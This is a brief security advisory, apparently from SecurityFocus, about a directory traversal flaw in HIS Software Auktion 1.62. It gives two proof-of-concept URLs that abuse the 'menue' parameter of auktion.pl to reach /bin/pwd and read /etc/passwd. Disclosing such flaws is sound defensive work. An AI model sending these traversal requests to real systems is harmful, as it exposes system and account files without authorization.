HIS Software Auktion 1.62 Directory Traversal Vulnerability

The following example has been provided by <cuctema@ok.ru>:

http://target/cgi-bin/auktion.pl menue=../../../../../../../../../../../../../bin/pwd

http://target/cgi-bin/auktion.pl menue=../../../../../../../../../../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus